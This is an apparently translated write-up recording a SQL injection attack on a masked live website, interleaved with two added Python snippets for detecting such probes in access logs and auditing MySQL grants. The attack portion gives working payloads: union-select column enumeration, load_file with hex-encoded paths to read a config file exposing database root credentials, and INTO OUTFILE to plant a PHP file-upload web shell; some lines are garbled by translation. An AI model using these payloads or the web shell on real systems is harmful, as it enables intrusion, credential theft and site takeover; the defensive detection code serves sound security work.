Record the entire process of a security check

Source: Internet
Author: User

 
The test site is as follows:

http://www.******.com

Find a page to test:

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830

Submit one

Returned results

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154

The error messages disclose the server path. The security check continues.

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830' and 1=1 #

An error is returned, so the parameter is not a string type.

Note: %23 is #

Submitting and 1=1 returns the normal page.

Submitting and 1=2 returns an abnormal page.

Next come the union statements.

and 1=1 union select 1 returns abnormal
and 1=1 union select 1,2 returns abnormal
and 1=1 union select 1,2,3 returns abnormal
and 1=1 union select 1,2,3,4 returns abnormal
and 1=1 union select 1,2,3,4,5 returns abnormal
and 1=1 union select 1,2,3,4,5,6 returns abnormal
and 1=1 union select 1,2,3,4,5,6,7 returns abnormal
and 1=1 union select 1,2,3,4,5,6,7,8 returns abnormal
and 1=1 union select 1,2,3,4,5,6,7,8,9 returns abnormal
and 1=1 union select 1,2,3,4,5,6,7,8,9,10 returns abnormal
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 returns abnormal
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 returns abnormal
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 returns abnormal
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 returns normal

The page returns normally at 14, so the query has 14 columns. Continue to the next step.

Generally, we cannot find the admin back end of a site like this.

Let's see whether there is one anyway.

Guess common paths.

login.php
admin.php
admin_login.php
admin_index.php
admin/login.php
admin/admin.php
admin/admin_login.php
admin/admin_index.php
manage/index.php
manage/login.php
manage/admin_login.php
manage/admin_index.php

And so on. If you have the patience, you can keep guessing slowly, but even a correct guess would be useless here.

Let's use a more direct method: read the file content directly with load_file.

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

Change and 1=1 to and 1=2:

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

The returned result is as follows:

2

The file content we need will be displayed at position 2.

The path /var/www/html/zhaobiao/zhaobiao_hy_show.php is known from the error messages.

Use load_file(/var/www/html/zhaobiao/zhaobiao_hy_show.php) directly.

The path /var/www/html/zhaobiao/zhaobiao_hy_show.php must first be converted to hexadecimal.

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file(Random),3,4,5,6,7,8,9,10,11,12,13,14

Returned results

0 or $regdate > mysql_result($query, 0, yxdate) {?>

", mysql_result($query, 0, sm); ?>

Ignore this output. The page source shows that the file includes an inc.php file; combined with the path found earlier, that gives:

/var/www/html/inc.php

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file(0x2f7661722f77772f68746d6c2f696e632e706870),3,4,5,6,7,8,9,10,11,12,13,14

The content is not visible in the rendered page that comes back; view the page source directly.

<?
$myconn = mysql_connect("localhost", "root", "www.******.comy0p5h1i0");
mysql_select_db("mlk");
?>

The MySQL credentials are exposed.

The next step is to log in to MySQL and insert the prepared pony (a small upload script).
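The request sequence recorded above (a quote and boolean probes, a union select whose column list grows by one per request, then load_file with a hex literal) leaves a recognizable trail in the web server's access log. The following Python detector is an added example, not part of the original write-up; the log lines, IP addresses and the three-width threshold are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IPs); only the script path is from the write-up.
P = "/zhaobiao/zhaobiao_hy_show.php?id="
SAMPLE_LOG = "\n".join(
    f'{ip} - - [01/Jan/2024:10:00:{i:02d} +0000] "GET {P}{q} HTTP/1.1" 200 812'
    for i, (ip, q) in enumerate([
        ("203.0.113.7", "149830"),
        ("203.0.113.7", "149830%27%20and%201=1%20%23"),
        ("203.0.113.7", "149830%20and%201=2"),
        ("203.0.113.7", "149830+and+1=1+union+select+1"),
        ("203.0.113.7", "149830+and+1=1+union+select+1,2"),
        ("203.0.113.7", "149830+and+1=1+union+select+1,2,3"),
        ("203.0.113.7", "149830+and+1=2+union+select+1,load_file(0x2f746d70),3"),
        ("198.51.100.4", "17"),
    ]))

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
RULES = {
    "quote_in_numeric_id": re.compile(r"[?&]id=\d*'", re.I),
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "union_select": UNION,
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
}

def analyze(log_text):
    """Return {client_ip: {"tags": set, "widths": set}} for requests matching any rule."""
    clients = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        target = unquote_plus(m.group(2))  # decode %20, %23 and + before matching
        tags = {name for name, rx in RULES.items() if rx.search(target)}
        if not tags:
            continue
        rec = clients.setdefault(m.group(1), {"tags": set(), "widths": set()})
        rec["tags"] |= tags
        u = UNION.search(target)
        if u:  # count select-list items, ignoring commas inside function calls
            tail = re.sub(r"\([^()]*\)", "", target[u.end():])
            rec["widths"].add(re.split(r"#|--", tail)[0].count(",") + 1)
    return clients

def is_column_enumeration(rec, min_widths=3):
    """Several distinct UNION widths from one client indicate column-count probing."""
    return len(rec["widths"]) >= min_widths
```

Decoding before matching matters here: the same probes arrive as `%20`, `+` or `%23` depending on the client, and a rule applied to the raw log line misses most of them.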

Use mlk;
Create table mmxy (cmd TEXT );
Insert into mmxy values (<? Php );
Insert into mmxy values ($ msg = copy ($ _ FILES [MyFile] [tmp_name], $ _ FILES [MyFile] [name])? "Successful": "failure ";);
Insert into mmxy values (echo $ msg ;);
Insert into mmxy values (?> );
Insert into mmxy values (<form ENCTYPE = "multipart/form-data" ACTION = "" METHOD = "POST"> );
Insert into mmxy values (<input NAME = "MyFile" TYPE = "file"> );
Insert into mmxy values (<input VALUE = "Up" TYPE = "submit"> </form> );
Select * from mmxy into outfile/var/www/html/zhaobiao/mmxy. php;
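
On the database side, the steps above depended on the web application connecting as root: load_file and into outfile both need the global FILE privilege, and the same account could be used to log in to MySQL directly. The following Python check is an added example, not part of the original write-up; it audits SHOW GRANTS output and the secure_file_priv setting, and the sample grants and the account names other than root are constructed.

```python
import re

# Constructed SHOW GRANTS output; web_app and report are hypothetical accounts.
SAMPLE_GRANTS = """\
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION
GRANT SELECT, INSERT, UPDATE ON `mlk`.* TO 'web_app'@'localhost'
GRANT SELECT, FILE ON *.* TO 'report'@'localhost'
"""

GRANT = re.compile(r"^GRANT (.+?) ON (\S+) TO '([^']*)'@'([^']*)'", re.I)
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def audit_grants(text):
    """Return {account: [findings]} for accounts with server file access or remote login."""
    findings = {}
    for line in text.splitlines():
        m = GRANT.match(line.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        account = f"{m.group(3)}@{m.group(4)}"
        issues = []
        # FILE is a global privilege; LOAD_FILE() and INTO OUTFILE both require it.
        if m.group(2) == "*.*" and privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            issues.append("file_access")
        if m.group(4) not in LOCAL_HOSTS:
            issues.append("remote_login")
        if issues:
            findings.setdefault(account, []).extend(issues)
    return findings

def audit_secure_file_priv(value, web_root="/var/www/html"):
    """value is the server's secure_file_priv setting (None for NULL)."""
    if value is None:
        return "ok: file import/export disabled"
    if value == "":
        return "weak: no directory restriction"
    if (value.rstrip("/") + "/").startswith(web_root.rstrip("/") + "/"):
        return "weak: export directory is inside the web root"
    return f"ok: restricted to {value}"
```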
